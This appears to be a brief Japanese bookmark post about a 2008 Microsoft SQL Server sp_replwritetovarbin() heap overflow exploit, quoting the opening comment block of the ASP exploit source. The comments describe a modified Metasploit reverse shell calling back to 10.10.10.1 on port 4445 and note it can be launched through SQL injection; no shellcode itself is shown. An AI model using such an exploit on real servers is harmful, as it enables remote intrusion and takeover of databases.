Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit (0day)(情報元のブックマーク数)
ASPで動いているみたいですが、リモートシェルを4445でオープンしちゃうみたいです。
<% // k`sOSe 12/17/2008 // Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow // Tested on Win2k SP4 with MSSQL 2000(on one box only!). // Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445), // the change allows multiple shots :) // // You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff. // Take a look at the comments in T-SQL